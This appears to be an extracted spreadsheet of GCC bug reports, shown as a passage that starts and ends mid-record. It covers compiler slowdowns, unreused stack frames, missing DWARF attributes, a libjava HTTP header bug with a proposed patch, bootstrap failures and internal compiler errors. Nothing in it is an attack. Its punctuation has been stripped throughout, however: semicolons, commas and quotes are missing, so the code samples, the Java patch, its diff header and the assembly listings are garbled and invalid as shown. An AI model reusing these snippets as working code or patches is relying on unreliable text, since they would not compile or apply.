I am available to do any kind of testing/experiments that
you would like me to.  If you are interested I should be
able to provide pre-processed source e.g. for the following
file:
AsExpression.o
2.95 -ggdb -ansi -pedantic -W              25.02s
3.0-branch -ggdb -ansi -pedantic -W        44.24s
2.95 -O2                                  207.28s 
3.0-branch -O2                            392.45s
Unfortunately due to a lack of a binary compatible 
support library I have not yet been able to test the
performance of the resulting executable.
Release:
CVS gcc-3_0-branch on March 3rd
Environment:
System: Linux 2.2.16-22smp
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: configure --prefix=/opt/gcc3.0 --enable-shared</t>
  </si>
  <si>
    <t>GCC-51060</t>
  </si>
  <si>
    <t>Temporary object stack space is not re-used</t>
  </si>
  <si>
    <t>Created attachment 25769
10 tmp objects of 1KB in size produce 10KB frame
I've tried hard finding a related incident the only one close to it is PR 16269 but its solution doesn't help.
Attached is a sample test which allocates 10 temporary objects of 1KB size in own blocks in the same function.
If compiled with -Wframe-larger-than=2048 -Werror -Os (-Oany) the following warning is produced:
warning: the frame size of 10240 bytes is larger than 2048 bytes [-Wframe-larger-than=]
In our case function frames are blown away for 100+KB what makes a code with similar pattern absolutely unusable in embedded systems.
Reproduced on GCC 4.6.1 x86_64 @ Debian and custom built GCC 4.6.2 for ARM.
The same issue exists in GCC 4.3.x for ARM.</t>
  </si>
  <si>
    <t>andvgal</t>
  </si>
  <si>
    <t>GCC-37275</t>
  </si>
  <si>
    <t>[4.4 Regression] ICE when compile libgomp/task.c</t>
  </si>
  <si>
    <t>gcc (GCC) 4.4.0 20080828 (experimental)
gcc  -g -O2 -march=i686 -fstack-protector -c task.c -o task.o</t>
  </si>
  <si>
    <t>GCC-43521</t>
  </si>
  <si>
    <t>java: this pointer not marked with DW_AT_artificial</t>
  </si>
  <si>
    <t>$ cat &gt; j.java &lt;&lt; EOF
&gt; class j
&gt; {
&gt;   public j () { }
&gt; 
&gt;   public static void main (String[] args)
&gt;   {
&gt;     j a = new j ()
&gt;     System.out.println (a =  + a)
&gt;  }
&gt; }
&gt; EOF
$ gcj -g j.java -o j --main=j
If you look at the debug info generated for the constructor gcj gives us:
 : Abbrev Number: 4 (DW_TAG_subprogram)
       DW_AT_external    : 1       
       DW_AT_name        : (indirect string offset: 0xe9):  
       DW_AT_decl_file   : 1       
       DW_AT_decl_line   : 3       
       DW_AT_MIPS_linkage_name: (indirect string offset: 0x11b): _ZN1jC1Ev        
       DW_AT_declaration : 1       
       DW_AT_sibling     :  
 : Abbrev Number: 5 (DW_TAG_formal_parameter)
       DW_AT_type        :  
       DW_AT_artificial  : 1       
Later gcj emits a DIE with location information:
 : Abbrev Number: 11 (DW_TAG_subprogram)
       DW_AT_specification:         
       DW_AT_low_pc      : 0x8048a64       
       DW_AT_high_pc     : 0x8048a7d       
       DW_AT_frame_base  : 0x38    (location list)
       DW_AT_sibling     :  
 : Abbrev Number: 12 (DW_TAG_formal_parameter)
       DW_AT_name        : (indirect string offset: 0xd1): this   
       DW_AT_decl_file   : 1       
       DW_AT_decl_line   : 3       
       DW_AT_type        :  
       DW_AT_location    : 2 byte block: 91 0      (DW_OP_fbreg: 0)
Everything is good until the formal parameter this: it is suddenly not marked with DW_AT_artificial.
The same thing happens with class methods too.</t>
  </si>
  <si>
    <t>keiths</t>
  </si>
  <si>
    <t>GCC-21074</t>
  </si>
  <si>
    <t>Trivial bug in the method  getHeaderFieldKey() in the file java/net/protocol/http/HTTPURLConnection.java</t>
  </si>
  <si>
    <t>Hi 
I found a little bug in the implementention of the method  
getHeaderFieldKey( int index ) in the file  
java/net/protocol/http/HTTPURLConnection.java. 
This method doesn't check if the parameter 'index' if out of range so if it  
is called with a index value too high a java.util.NoSuchElementException is  
raised. 
Instead the java doc  
( http://java.sun.com/j2se/1.4.2/docs/api/java/net/HttpURLConnection.html#getHeaderFieldKey(int) )  
report that this method should return 'the value of the nth header field or  
null if the value does not exist.' 
I suggest this patch to correct this beaviour the patch implement the same  
control performed by the method getHeaderField( ). 
--- old/libjava/gnu/java/net/protocol/http/HTTPURLConnection.java       Sun  
Apr 17 11:10:59 2005 
+++ new/libjava/gnu/java/net/protocol/http/HTTPURLConnection.java       Sun  
Apr 17 11:13:53 2005 
@@ -5436 +54310 @@ 
     int count = 1 
     do 
       { 
+        if (!i.hasNext()) 
+          { 
+            return null 
+          } 
         entry = (Map.Entry) i.next() 
         count++ 
       } 
Below are the test case used to highligh the problem comparing the beaviour  
of the sun's java and the gnu one. The last case is a case with the patch 
applied 
[ghigo@therra tmp]$ cat testbed.java 
import java.net.* 
public class testbed { 
        static public void main( String args[] ) throws Exception { 
                URL u=new URL(args[0]) 
                HttpURLConnection con = (HttpURLConnection)u.openConnection() 
                int     n=1 
                while(true){ 
                        String headerKey = con.getHeaderFieldKey(n) 
                        if(headerKey==null ){ 
                                System.out.print(con.getHeaderFieldKey( ) has  
returned null\n) 
                                break 
                        } 
                        System.out.print(headerKey: +headerKey+\n) 
                        String headerVal = con.getHeaderField(n) 
                        System.out.print(headerVal: +headerVal+\n) 
                        n++ 
                } 
        } 
} 
[ghigo@therra tmp]$ java -version    # Fedora core 4 test 2 
java version 1.4.2 
gcj (GCC) 4.0.0 20050405 (Red Hat 4.0.0-0.40) 
Copyright (C) 2005 Free Software Foundation Inc. 
This is free software see the source for copying conditions.  There is NO 
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
[ghigo@therra tmp]$ java -cp . testbed http://www.google.com 
headerKey: Cache-Control 
headerVal: private 
headerKey: Content-Type 
headerVal: text/html 
headerKey: Set-Cookie 
headerVal:  
PREF=ID=158312593220e9b1:LD=it:TM=1113727883:LM=1113727883:S=Y7zUs9KFT_BVs6d7  
expires=Sun 17-Jan-2038 19:14:07 GMT path=/ domain=.google.it 
headerKey: Server 
headerVal: GWS/2.1 
headerKey: Transfer-Encoding 
headerVal: chunked 
headerKey: Date 
headerVal: Sun 17 Apr 2005 08:51:23 GMT 
Exception in thread main java.util.NoSuchElementException 
   at java.util.LinkedHashMap$1.next() (/usr/lib/libgcj.so.6.0.0) 
   at gnu.java.net.protocol.http.HTTPURLConnection.getHeaderFieldKey(int)  
(/usr/lib/libgcj.so.6.0.0) 
   at testbed.main(java.lang.String[]) (Unknown Source) 
   at gnu.java.lang.MainThread.call_main() (/usr/lib/libgcj.so.6.0.0) 
   at gnu.java.lang.MainThread.run() (/usr/lib/libgcj.so.6.0.0) 
[ghigo@therra tmp]$ /usr/local/java-1.5/jdk1.5.0_01/bin/java -version  
java version 1.5.0_01 
Java(TM) 2 Runtime Environment Standard Edition (build 1.5.0_01-b08) 
Java HotSpot(TM) Client VM (build 1.5.0_01-b08 mixed mode sharing) 
[ghigo@therra tmp]$ /usr/local/java-1.5/jdk1.5.0_01/bin/java -cp . testbed  
http://www.google.com 
headerKey: Cache-Control 
headerVal: private 
headerKey: Content-Type 
headerVal: text/html 
headerKey: Set-Cookie 
headerVal:  
PREF=ID=81a840411c05e572:LD=it:TM=1113727895:LM=1113727895:S=B5ZxkSzn6RkPyhGV  
expires=Sun 17-Jan-2038 19:14:07 GMT path=/ domain=.google.it 
headerKey: Server 
headerVal: GWS/2.1 
headerKey: Transfer-Encoding 
headerVal: chunked 
headerKey: Date 
headerVal: Sun 17 Apr 2005 08:51:35 GMT 
con.getHeaderFieldKey( ) has returned null 
The last example was executed with the patch applied to the java library 
[ghigo@therra tmp]$ /opt/gcc-4.0.0-20050410/bin/gcj-400 --version 
gcj-400 (GCC) 4.0.0 20050410 (prerelease) 
Copyright (C) 2005 Free Software Foundation Inc. 
This is free software see the source for copying conditions.  There is NO 
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
[ghigo@therra tmp]$ CLASSPATH=.:/opt/gcc-4.0.0-20050410/lib \ 
/opt/gcc-4.0.0-20050410/bin/gij-400 testbed http://www.google.com  
http://www.google.com 
headerKey: Cache-Control 
headerVal: private 
headerKey: Content-Type 
headerVal: text/html 
headerKey: Set-Cookie 
headerVal: 
PREF=ID=bb14539184e1692b:LD=it:TM=1113763098:LM=1113763098:S=DpuOWd-IfDkN2-tO 
expires=Sun 17-Jan-2038 19:14:07 GMT path=/ domain=.google.it 
headerKey: Server 
headerVal: GWS/2.1 
headerKey: Transfer-Encoding 
headerVal: chunked 
headerKey: Date 
headerVal: Sun 17 Apr 2005 18:38:18 GMT 
con.getHeaderFieldKey( ) has returned null 
Ciao 
Goffredo</t>
  </si>
  <si>
    <t>kreijack</t>
  </si>
  <si>
    <t>GCC-55552</t>
  </si>
  <si>
    <t>--enable-gold=default doesn't work with in-tree binutils</t>
  </si>
  <si>
    <t>Toplevel configure supports:
# Handle --enable-gold --enable-ld.
# --disable-gold [--enable-ld]
#     Build only ld.  Default option.
# --enable-gold [--enable-ld]
#     Build both gold and ld.  Install gold as ld.gold install ld
#     as ld.bfd and ld.
# --enable-gold=default [--enable-ld]
#     Build both gold and ld.  Install gold as ld.gold and ld
#     install ld as ld.bfd.
# --enable-gold[=default] --disable-ld
#     Build only gold which is then installed as both ld.gold and ld.
# --enable-gold --enable-ld=default
#     Build both gold (installed as ld.gold) and ld (installed as ld
#     and ld.bfd).
#     In other words ld is default
# --enable-gold=default --enable-ld=default
#     Error.
However gcc directory doesn't handle --enable-gold=default properly.</t>
  </si>
  <si>
    <t>GCC-71016</t>
  </si>
  <si>
    <t>[6 Regression] Redundant sign extension with conditional __builtin_clzl</t>
  </si>
  <si>
    <t>Consider:
long int foo (long i)
{
  return (i == 0) ? 17 : __builtin_clzl (i)
}
On aarch64 with GCC 5 at -O2 we generate:
foo:
        mov     x2 17
        clz     x1 x0
        cmp     x0 xzr
        csel    x0 x1 x2 ne
        ret
whereas with GCC 6 and trunk we generate:
foo:
        mov     w1 17
        clz     x2 x0
        cmp     x0 0
        csel    w0 w1 w2 eq
        sxtw    x0 w0  //redundant sign-extend
        ret
In GCC 5 the tree structure being expanded is:
  i.1_3 = (long unsigned int) i_2(D)
  _4 = __builtin_clzl (i.1_3)
  iftmp.0_5 = (long int) _4
   basic block 4 loop depth 0
    pred:       3
                2
  # iftmp.0_1 = PHI 
  return iftmp.0_1
so the RTL optimisers see the DI mode clz followed by a subreg and
a sign-extend and optimise it away.
However trunk now moves the sign-extend out of the conditional:
  i.1_3 = (long unsigned int) i_2(D)
  _4 = __builtin_clzl (i.1_3)
   basic block 4 loop depth 0
    pred:       3
                2
  # _7 = PHI 
  prephitmp_8 = (long int) _7
  return prephitmp_8
So it's very hard for RTL ifcvt or combine or ree to catch it.</t>
  </si>
  <si>
    <t>GCC-18323</t>
  </si>
  <si>
    <t>mmix-knuth-mmixware testsuite failure: gcc.c-torture/compile/nested-1.c</t>
  </si>
  <si>
    <t>See also PR 16567.
Public note of failure.  Failed since testcase was ever added.
Public note of failure.  The test has failed ever since it was added.
With LAST_UPDATED Sat Nov  6 19:25:03 GMT 2004 the result is:
FAIL: gcc.c-torture/compile/nested-1.c  -O0  (test for excess errors)
FAIL: gcc.c-torture/compile/nested-1.c  -O1  (test for excess errors)
FAIL: gcc.c-torture/compile/nested-1.c  -O2  (test for excess errors)
FAIL: gcc.c-torture/compile/nested-1.c  -O3 -fomit-frame-pointer  (test for
excess errors)
FAIL: gcc.c-torture/compile/nested-1.c  -O3 -g  (test for excess errors)
FAIL: gcc.c-torture/compile/nested-1.c  -Os  (test for excess errors)
With the error:
gcc/testsuite/gcc.c-torture/compile/nested-1.c: In function 'nested':
gcc/testsuite/gcc.c-torture/compile/nested-1.c:11: internal compiler error: in
expand_expr_real_1 at expr.c:6398</t>
  </si>
  <si>
    <t>GCC-36864</t>
  </si>
  <si>
    <t>[4.4 Regression] Yet another bootstrap failure on i686-apple-darwin9</t>
  </si>
  <si>
    <t>On i686-apple-darwin9 (XCode 3.0 or 3.1) bootstrap fails at revision 137901 up to now (works at revision 137781) with:
...
if /bin/sh ./libtool --tag=CC --mode=compile /opt/gcc/i686-darwin/./gcc/xgcc -B/opt/gcc/i686-darwin/./gcc/ -B/opt/gcc/gcc4.4w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.4w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.4w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.4w/i686-apple-darwin9/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-4.4-work/libgfortran -I.  -iquote../../../gcc-4.4-work/libgfortran/io -I../../../gcc-4.4-work/libgfortran/../gcc -I../../../gcc-4.4-work/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE  -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -g -O2   -MT eoshift1_4.lo -MD -MP -MF .deps/eoshift1_4.Tpo -c -o eoshift1_4.lo `test -f '../../../gcc-4.4-work/libgfortran/generated/eoshift1_4.c' || echo '../../../gcc-4.4-work/libgfortran/'`../../../gcc-4.4-work/libgfortran/generated/eoshift1_4.c \
        then mv -f .deps/eoshift1_4.Tpo .deps/eoshift1_4.Plo else rm -f .deps/eoshift1_4.Tpo exit 1 fi
libtool: compile:  /opt/gcc/i686-darwin/./gcc/xgcc -B/opt/gcc/i686-darwin/./gcc/ -B/opt/gcc/gcc4.4w/i686-apple-darwin9/bin/ -B/opt/gcc/gcc4.4w/i686-apple-darwin9/lib/ -isystem /opt/gcc/gcc4.4w/i686-apple-darwin9/include -isystem /opt/gcc/gcc4.4w/i686-apple-darwin9/sys-include -DHAVE_CONFIG_H -I. -I../../../gcc-4.4-work/libgfortran -I. -iquote../../../gcc-4.4-work/libgfortran/io -I../../../gcc-4.4-work/libgfortran/../gcc -I../../../gcc-4.4-work/libgfortran/../gcc/config -I../.././gcc -D_GNU_SOURCE -std=gnu99 -Wall -Wstrict-prototypes -Wmissing-prototypes -Wold-style-definition -Wextra -Wwrite-strings -fcx-fortran-rules -g -O2 -MT eoshift1_4.lo -MD -MP -MF .deps/eoshift1_4.Tpo -c ../../../gcc-4.4-work/libgfortran/generated/eoshift1_4.c  -fno-common -DPIC -o .libs/eoshift1_4.o
../../../gcc-4.4-work/libgfortran/generated/eoshift1_4.c: In function 'eoshift1':
../../../gcc-4.4-work/libgfortran/generated/eoshift1_4.c:46: internal compiler error: Bus error
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
make[3]: *** [eoshift1_4.lo] Error 1
make[2]: *** [all] Error 2
make[1]: *** [all-target-libgfortran] Error 2</t>
  </si>
  <si>
    <t>GCC-25911</t>
  </si>
  <si>
    <t>[4.2 Regression] ice in vect_recog_dot_prod_pattern</t>
  </si>
  <si>
    <t>I just tried to compile package gsl-1.7-2 from Suse Linux with a recent
GNU C compiler version 4.2 snapshot 20060121. 
The compiler snapshot said
/home/dcb/gnu/42-20060121/results/bin/gcc -g -O3 -Wall -fmessage-length=0 -DHAVE_CONFIG_H -I. -I. -I.. -I.. -O2 -g -fmessage-length=0 -D_FORTIFY_SOURCE=2 -O3 -finline-limit=720 --param max-inline-insns-auto=160 -ffast-math -funroll-loops -fno-strict-aliasing -momit-leaf-frame-pointer -funit-at-a-time -ftree-vectorize -c bessel_Kn.c  -fPIC -DPIC -o bessel_Kn.o
bessel_Kn.c: In function sel_Kn.c:103: internal compiler error: in vect_recog_dot_prod_pattern at tree-vect-patterns.c:246
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
It seems that the flags -O2  -ffast-math -ftree-vectorize are required.
Preprocessed source code attached.</t>
  </si>
  <si>
    <t>GCC-10016</t>
  </si>
  <si>
    <t>g++ allows access to static private class members if initialized</t>
  </si>
  <si>
    <t xml:space="preserve">From: Wolfgang Bangerth 
To: gcc-gnats@gcc.gnu.org
Cc:  
Subject: Re: c++/10016
Date: Mon 10 Mar 2003 10:09:13 -0600 (CST)
 If someone wants to try backporting this to 3.3 or 3.2: the patch appeared 
 in this timeframe
 test/x&gt; ../../bin/gcc-2002-12-25/bin/c++ -c 10016.cc
 test/x&gt; ../../bin/gcc-2003-01-05/bin/c++ -c 10016.cc
 10016.cc: In member function `int B::f()':
 10016.cc:5: error: `int A::foo' is private
 10016.cc:11: error: within this context
 That's also the timeframe in which the new parser was merged but it might 
 also be unrelated.
 W.
 -------------------------------------------------------------------------
 Wolfgang Bangerth             email:            bangerth@ticam.utexas.edu
                               www: http://www.ticam.utexas.edu/~bangerth/
</t>
  </si>
  <si>
    <t>GCC-4686</t>
  </si>
  <si>
    <t>Output disappearing after operator&lt;&lt;( streambuf* )</t>
  </si>
  <si>
    <t>Output using operator&lt;&lt;( streambuf * ) has
strange behavior.  In the example the following
output fails to occur.
Release:
g++ 3.0.0
Environment:
dxcs8h@~/tmp/gcc (66): uname -a
SunOS dxcs8h 5.7 Generic_106541-12 sun4u sparc SUNWUltra-60
dxcs8h@~/tmp/gcc (67): g++3 -v
Reading specs from /opt/global/pkg/gcc-3.0.0_threads/lib/gcc-lib/sparc-sun-solaris2.7/3.0/specs
Configured with: ./configure --prefix=/opt/global/pkg/gcc-3.0.0_threads --enable-threads=posix
Thread model: posix
gcc version 3.0
g++: No input files
How-To-Repeat:
Just compile and look at output.  The there is
no trace of the second output statement.</t>
  </si>
  <si>
    <t>GCC-63622</t>
  </si>
  <si>
    <t>[5.0 Regression] Bootstrap fails on x86_64-apple-darwin1[34] after revision r216305</t>
  </si>
  <si>
    <t>Bootstrap fails on x86_64-apple-darwin1[34] after revision r216305:
...
libtool: link:  /opt/gcc/p_build/./gcc/xgcc -shared-libgcc -B/opt/gcc/p_build/./gcc -nostdinc++ -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/src -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/src/.libs -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/libsupc++/.libs -B/opt/gcc/gcc4.10p-216305p1/x86_64-apple-darwin14.0.0/bin/ -B/opt/gcc/gcc4.10p-216305p1/x86_64-apple-darwin14.0.0/lib/ -isystem /opt/gcc/gcc4.10p-216305p1/x86_64-apple-darwin14.0.0/include -isystem /opt/gcc/gcc4.10p-216305p1/x86_64-apple-darwin14.0.0/sys-include    -dynamiclib -Wl-undefined -Wldynamic_lookup -o .libs/libstdc++.6.dylib  .libs/compatibility.o .libs/compatibility-debug_list.o .libs/compatibility-debug_list-2.o .libs/compatibility-c++0x.o .libs/compatibility-atomic-c++0x.o .libs/compatibility-thread-c++0x.o .libs/compatibility-chrono.o .libs/compatibility-condvar.o   -Wl-force_load../libsupc++/.libs/libsupc++convenience.a -Wl-force_load../src/c++98/.libs/libc++98convenience.a -Wl-force_load../src/c++11/.libs/libc++11convenience.a  -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/libsupc++/.libs -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/src -L/opt/gcc/p_build/x86_64-apple-darwin14.0.0/libstdc++-v3/src/.libs -lm  -Wl-single_module -Wl-exported_symbols_list -Wllibstdc++-symbols.explist   -install_name  /opt/gcc/gcc4.10p-216305p1/lib/libstdc++.6.dylib -compatibility_version 7 -current_version 7.21 -Wl-single_module
ld: warning: cannot export hidden symbol __cxxabiv1::__pbase_type_info::__pointer_catch(__cxxabiv1::__pbase_type_info const* void** unsigned int) const from ../libsupc++/.libs/libsupc++convenience.a(pbase_type_info.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++98/.libs/libc++98convenience.a(complex_io.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++98/.libs/libc++98convenience.a(complex_io.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++98/.libs/libc++98convenience.a(ctype.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char char) const from ../src/c++98/.libs/libc++98convenience.a(ctype.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char const* char const* char char*) const from ../src/c++98/.libs/libc++98convenience.a(ctype.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char const* char const* char*) const from ../src/c++98/.libs/libc++98convenience.a(ctype.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::istrstream from ../src/c++98/.libs/libc++98convenience.a(strstream.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_ostream &gt;-in-std::ostrstream from ../src/c++98/.libs/libc++98convenience.a(strstream.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::strstream from ../src/c++98/.libs/libc++98convenience.a(strstream.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_iostream &gt;-in-std::strstream from ../src/c++98/.libs/libc++98convenience.a(strstream.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++98/.libs/libc++98convenience.a(ctype_members.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char char) const from ../src/c++98/.libs/libc++98convenience.a(ctype_members.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char const* char const* char char*) const from ../src/c++98/.libs/libc++98convenience.a(ctype_members.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char const* char const* char*) const from ../src/c++98/.libs/libc++98convenience.a(ctype_members.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++98/.libs/libc++98convenience.a(locale-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char char) const from ../src/c++98/.libs/libc++98convenience.a(locale-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char const* char const* char*) const from ../src/c++98/.libs/libc++98convenience.a(locale-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++98/.libs/libc++98convenience.a(misc-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::~stdio_sync_filebuf() from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::~stdio_sync_filebuf() from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::~stdio_sync_filebuf() from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::~stdio_sync_filebuf() from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::xsgetn(wchar_t* long) from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::xsputn(wchar_t const* long) from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::xsputn(char const* long) from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol __gnu_cxx::stdio_sync_filebuf &gt;::xsgetn(char* long) from ../src/c++11/.libs/libc++11convenience.a(ext11-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++11/.libs/libc++11convenience.a(ios-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_narrow(char char) const from ../src/c++11/.libs/libc++11convenience.a(ios-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++11/.libs/libc++11convenience.a(istream-inst.o)
ld: warning: cannot export hidden symbol std::ctype::do_widen(char) const from ../src/c++11/.libs/libc++11convenience.a(ostream-inst.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol std::basic_stringbuf std::allocator &gt;::~basic_stringbuf() from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::basic_istringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_ostream &gt;-in-std::basic_ostringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_ostream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_iostream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::basic_istringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_ostream &gt;-in-std::basic_ostringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_ostream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_istream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: warning: cannot export hidden symbol construction vtable for std::basic_iostream &gt;-in-std::basic_stringstream std::allocator &gt; from ../src/c++11/.libs/libc++11convenience.a(sstream-inst.o)
ld: illegal text reloc in 'std::strstream::strstream()' to 'construction vtable for std::basic_ostream &gt;-in-std::strstream' for architecture x86_64
...
using the following command 
/opt/gcc/build_w/./gcc/xgcc -shared-libgcc -B/opt/gcc/build_w/./gcc -L/opt/gcc/build_w/x86_64-apple-darwin14.0.0/libstdc++-v3/src -L/opt/gcc/build_w/x86_64-apple-darwin14.0.0/libstdc++-v3/src/.libs -L/opt/gcc/build_w/x86_64-apple-darwin14.0.0/libstdc++-v3/libsupc++/.libs -dynamiclib -Wl-undefined -Wldynamic_lookup .libs/compatibility.o -Wl-force_load../src/c++98/.libs/libc++98convenience.a
in x86_64-apple-darwin14.0.0/libstdc++-v3/src gives
ld: illegal text reloc in 'std::strstream::strstream()' to 'construction vtable for std::basic_ostream &gt;-in-std::strstream' for architecture x86_64
collect2: error: ld returned 1 exit status</t>
  </si>
  <si>
    <t>GCC-52184</t>
  </si>
  <si>
    <t>Wrong object initialization in virtual inhreitance</t>
  </si>
  <si>
    <t>kamil.holubicki</t>
  </si>
  <si>
    <t>GCC-44722</t>
  </si>
  <si>
    <t>[4.6 Regression] Bootstrap fails during libjava</t>
  </si>
  <si>
    <t>gfortran -O2 array_reference_1.f90 just hangs.  I have to go in and kill it manually.  This is just one example.  There were several failures before I interrupted make -k check-fortran in order to recover enough CPU cycles to then go in an kill f951 that was left running.
No problems at -O1 so maybe middle-end?</t>
  </si>
  <si>
    <t>GCC-13341</t>
  </si>
  <si>
    <t>ctype::do_narrow(wchar_t char) is slow</t>
  </si>
  <si>
    <t>Consider the following code: it shows that by building at construction time
a simple table for all the wchar_t from 0 to 128 the speed of narrow can be
increased by a factor of 10 in the common case.
Similarly for the array version and for widen (both single char and array).
///////////////////////////
#include 
#include 
struct CtypeS: std::ctype
{
 char
 do_narrow(wchar_t __wc char __dfault) const
 {
   int __c = wctob(__wc)
   return (__c == EOF ? __dfault : static_cast(__c))
 }
}
struct CtypeF: std::ctype
{
 int cached[128]
 char
 do_narrow(wchar_t __wc char __dfault) const
 {
   int __c
   if (__wc &lt; 128)
     __c = cached[__wc]
   else
     __c = wctob(__wc)
   return (__c == EOF ? __dfault : static_cast(__c))
 }
}
int main()
{
 using namespace std
 //locale loc = locale(locale::classic() new CtypeF)
 locale loc = locale(locale::classic() new CtypeS)
 const ctype
 for (long i = 0 i &lt; 100000000 ++i)
   ct.narrow(i % 128 '*')
}
//////////////////////////</t>
  </si>
  <si>
    <t>GCC-67106</t>
  </si>
  <si>
    <t>[6 Regression] ICE: verify_type failed:  type variant differs by TYPE_PACKED. with -g -fpack-struct</t>
  </si>
  <si>
    <t>Created attachment 36114
reduced testcase
Compiler output:
$ /mnt/svn/gcc-trunk/binary-latest/bin/gcc -g -fpack-struct testcase.c 
testcase.c:8:3: error: type variant differs by TYPE_PACKED.
   }
   ^
 &lt;record_type 0x7fdaa76b7f18 S packed type_0 VOID
    align 8 symtab -1486058768 alias set -1 canonical type 0x7fdaa76b7f18
    pointer_to_this  chain &gt;
 &lt;record_type 0x7fdaa76da000 S VOID
    align 8 symtab -1486058848 alias set -1 canonical type 0x7fdaa76b7f18
    pointer_to_this  chain &gt;
testcase.c:8:3: internal compiler error: verify_type failed
0xeb4379 verify_type(tree_node const*)
        /mnt/svn/gcc-trunk/gcc/tree.c:13570
0x7c3d34 gen_type_die_with_usage
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20685
0x7c44c5 gen_type_die_with_usage
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20783
0x7c5516 gen_type_die
        /mnt/svn/gcc-trunk/gcc/dwarf2out.c:20879
0x7d354d gen_decl_die
